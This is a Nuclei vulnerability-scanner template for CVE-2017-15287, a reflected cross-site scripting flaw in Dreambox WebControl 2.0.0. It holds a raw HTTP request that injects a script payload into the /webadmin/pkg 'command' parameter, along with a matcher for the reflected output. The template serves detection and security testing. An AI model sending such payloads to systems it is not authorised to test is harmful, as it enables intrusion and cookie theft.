CVE-2017-15287: Dreambox WebControl 2.0.0 - Cross-Site Scripting

id: CVE-2017-15287

info:
  name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
  reference:
    - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
    - https://www.exploit-db.com/exploits/42986/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15287
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-15287
    cwe-id: CWE-79
    epss-score: 0.03021
    epss-percentile: 0.8619
    cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
  metadata:
    max-request: 1
    vendor: bouqueteditor_project
    product: bouqueteditor
    framework: dreambox
  tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project,vuln

http:
  - raw:
      - |
        GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: word
        words:
          - 'Unknown command: <script>alert(document.cookie)</script>'
# digest: 4a0a00473045022038e2900f01c113cd68776cbef26287e030b7b309d68d53570563de5e7fca28440221008bdcce2894f3e3e088a03e1030436481478e29b18312aa253d5901edfabeb084:922c64590222798bb761d5b6d8e72950